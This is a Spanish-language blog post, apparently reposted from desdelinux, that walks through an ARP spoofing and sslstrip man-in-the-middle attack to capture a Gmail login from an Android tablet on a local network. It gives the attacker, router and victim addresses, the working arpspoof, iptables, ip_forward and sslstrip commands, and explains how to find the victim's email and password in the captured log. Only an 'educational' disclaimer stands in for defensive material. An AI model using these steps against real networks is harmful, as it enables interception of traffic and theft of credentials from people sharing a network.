Jueves, Noviembre 23, 2017

ArpSpoofing y SSlstrip en Acción

ArpSpoofing y SSlstrip en Acción

Para hoy les tengo una pequeña muestra de lo peligroso que puede ser estar conectados en cualquier red sin seguridad de esas que tantos nos gustan.

Para el día de hoy, voy a usar ArpSpoofing con Sslstrip para conseguir una contraseña de Gmail. Para hacer el ambiente mas controlado, he creado una cuenta llamada “Esta dirección de correo electrónico está siendo protegida contra los robots de spam. Necesita tener JavaScript habilitado para poder verlo.”.

Y como no me gustan mucho los preámbulos vamos a ponernos a jugar.

No me hago responsable en ningún momento de lo que puedan hacer con la siguiente información. Lo hago exclusivamente con fines educativos

ENTORNO

Para esta prueba lo que tenemos es lo siguiente:

1. Atacante: Es mi ordenador de mesa o Desktop que tiene Debian Wheezy. Desde repositorios se puede instalar sslstrip y dsniff para conseguir tener arpspoofing

2. Victima: La víctima es una Tablet con Android que solamente quiere ver su correo por medio del navegador.

3. El medio: El medio es mi Router Cisco DPC2425

DIRECCIONES.

Direccion del atacante: 172.26.0.2

Direccion del Router: 172.26.0.1

Direccion de la Victima: 172.26.0.8

EL ATAQUE:

Para entener un poco más el funcionamiento del ataque puedes dirigirte a mi antiguo POST

Lo primero que haremos para este ataque será activar el forward para que nuestro ordenador pueda reenviar la información a la víctima sin que se de cuenta. (De lo contrario seria un ataque de denegación de servicios)

Para eso usaremos:

echo "1" > /proc/sys/net/ipv4/ip_forward iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080 arpspoof -i eth0 -t 172.26.0.8 172.26.0.1 arpspoof -i eth0 -t 172.26.0.1 172.26.0.2 sslstrip -a -w desdelinux -l 8080

Cada comando en una ventana de consola diretente.

Ahora si hacemos tail -f desdelinux vemos la informacion en vivo y en directo

Entonces luego como conseguimos lo que queremos?

Vamos primero a ingresar a nuestro correo en la Tablet. Mientras abre sesión vemos que en nuestra consola salen miles y miles de cosas.

Ahora que ha terminado vamos a abrir nuestro archivo “desdelinux” con nano

[code] nano desdelinux[/code]

con Control + W bucamos algo que se llama SECURE POST.

Y vamos a ver algo como esto.

Entre esa linea enorme que no se alcanza a terminar de ver está el correo y la contraseña de la víctima.

Entonces corremos hacia la derecha hasta que por fin vemos la luz al final del túnel.

ArpSpoofing y SSlstrip en Acción

En otra ocasión veremos como nos podemos proteger un poco de estos ataques.

 

Fuente: desdelinux

Compártelo. ¡Gracias!

 
Grupo Digital de Ayuda! Laboratorio Linux! - Linux para todos.

¿Quién está en línea?

Hay 26 invitados y ningún miembro en línea

Contador de Visitas

9053047
Hoy Hoy 466
Ayer Ayer 833
Esta semana Esta semana 3653
Este mes Este mes 31538
Total de Visitas Total de Visitas 9053047

Día con más
visitantes

11-11-2017 : 2493

Gracias por su visita